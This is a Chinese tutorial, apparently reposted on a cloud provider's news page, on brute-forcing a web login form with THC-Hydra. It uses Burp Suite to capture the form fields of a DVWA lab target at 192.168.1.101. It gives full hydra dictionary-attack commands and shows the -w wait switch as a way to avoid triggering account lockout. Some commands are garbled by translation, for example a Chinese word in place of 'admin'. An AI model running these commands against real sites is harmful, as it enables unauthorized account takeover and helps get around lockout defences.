溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

如何使用THC-Hydra破解網(wǎng)站登錄密碼

發(fā)布時(shí)間:2021-11-09 18:28:11 來源:億速云 閱讀:1869 作者:柒染 欄目:大數(shù)據(jù)

這期內(nèi)容當(dāng)中小編將會給大家?guī)碛嘘P(guān)如何使用THC-Hydra破解網(wǎng)站登錄密碼,文章內(nèi)容豐富且以專業(yè)的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。

步驟1:打開THC-Hydra

如何使用THC-Hydra破解網(wǎng)站登錄密碼

步驟2:獲取Web表單參數(shù)

網(wǎng)站的IP地址

網(wǎng)址

表格類型

包含用戶名的字段

包含密碼的字段

失敗訊息

 如果是還沒獲取,繼續(xù)下一步

步驟3:使用Burp Suite獲取參數(shù)  

如何使用THC-Hydra破解網(wǎng)站登錄密碼

我們需要在Burp Suite上啟用代理,最后,我們需要配置IceWeasel Web瀏覽器以使用代理。我們可以轉(zhuǎn)到“編輯”->“首選項(xiàng)”->“高級”->“網(wǎng)絡(luò)”->“設(shè)置”以打開“連接設(shè)置”,如下所示。在那里,通過在HTTP Proxy字段中鍵入127.0.0.1 ,在Port字段中鍵入8080,并在底部的No Proxy for字段中刪除任何信息,將IceWeasel配置為使用127.0.0.1端口8080作為代理。另外,選擇“將此代理服務(wù)器用于所有協(xié)議”按鈕。

如何使用THC-Hydra破解網(wǎng)站登錄密碼

步驟4:獲取登錄參數(shù)

現(xiàn)在,讓我們嘗試使用我的用戶名OTW和密碼OTW登錄。當(dāng)我這樣做時(shí),BurpSuite會截獲該請求并向我們顯示THC-Hydra Web表單破解所需的關(guān)鍵字段。

如何使用THC-Hydra破解網(wǎng)站登錄密碼

如何使用THC-Hydra破解網(wǎng)站登錄密碼

步驟5:將參數(shù)放入您的THC Hydra命令

現(xiàn)在,有了參數(shù),我們可以將它們放入THC-Hydra命令中。語法如下所示:

kali> hydra -L <用戶名列表> -p <密碼列表> <IP地址> <表單參數(shù)> <失敗的登錄消息>

因此,根據(jù)我們從Burp Suite收集的信息,我們的命令應(yīng)如下所示:

kali> hydra -L <單詞列表> -P <密碼列表>

192.168.1.101 http-post-form“ /dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:登錄失敗”

需要注意的幾件事。首先,如果要使用用戶名列表,則使用大寫字母“ L”;如果要破解那里提供的一個(gè)用戶名,則使用小寫字母“ l”。在這種情況下,我將使用小寫的“ l”,因?yàn)槲抑粫L試破解“ admin”密碼。

步驟6:選擇一個(gè)破解詞單

現(xiàn)在,我們需要選擇一個(gè)單詞表。與任何字典攻擊一樣,單詞表是關(guān)鍵。您可以使用由Crunch of CeWL制作的自定義單詞,但是Kali內(nèi)置了許多單詞列表。要查看所有單詞列表,只需鍵入:

kali > locate wordlist


此外,還有許多在線網(wǎng)站,這些網(wǎng)站的單詞表最大可以達(dá)到100 GB!明智地選擇,我的黑客會創(chuàng)新。在這種情況下,我將在以下位置使用少于1000個(gè)單詞的內(nèi)置單詞列表:

/usr/share/dirb/wordlists/short.txt

步驟7:構(gòu)建命令

kali> hydra -l管理員-P /usr/share/dirb/wordlists/small.txt 192.168.1.101 http-post-form“ /dvwa/login.php:username=^USER^&password=^PASS^&Login=登錄:登錄失敗” -V  

如何使用THC-Hydra破解網(wǎng)站登錄密碼

步驟8:讓她飛!

現(xiàn)在,讓她飛!由于我們使用了-V開關(guān),因此THC-Hydra將向我們展示所有嘗試。

如何使用THC-Hydra破解網(wǎng)站登錄密碼

幾分鐘后,Hydra會返回我們的Web應(yīng)用程序的密碼。成功!

如何使用THC-Hydra破解網(wǎng)站登錄密碼

在Web表單中成功使用它的關(guān)鍵是確定表單對登錄失敗與成功登錄的不同響應(yīng)方式。在上面的示例中,我們確定了失敗的登錄消息,但是我們可以確定成功的消息并使用了它。要使用成功消息,我們將失敗登錄消息替換為“ S = successful message”,例如:


kali> hydra -l管理員-P /usr/share/dirb/wordlists/small.txt 192.168.1.101 http-post-form“ /dvwa/login.php:username=^USER^&password=^PASS^&S=成功消息“ -V


還有


另外,某些Web服務(wù)器會注意到許多快速失敗的登錄嘗試并鎖定了您。在這種情況下,您將需要在THC-Hydra中使用等待功能。這將在兩次嘗試之間添加一個(gè)等待時(shí)間,以免觸發(fā)鎖定。您可以通過-w開關(guān)使用此功能,因此我們通過編寫以下命令來修改命令以在兩次嘗試之間等待10秒:


kali> hydra -l管理員-P /usr/share/dirb/wordlists/small.txt 192.168.1.101 http-post-form“ /dvwa/login.php:username=^USER^&password=^PASS^&Login=登錄:登錄失敗” -w 10 -V

上述就是小編為大家分享的如何使用THC-Hydra破解網(wǎng)站登錄密碼了,如果剛好有類似的疑惑,不妨參照上述分析進(jìn)行理解。如果想知道更多相關(guān)知識,歡迎關(guān)注億速云行業(yè)資訊頻道。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI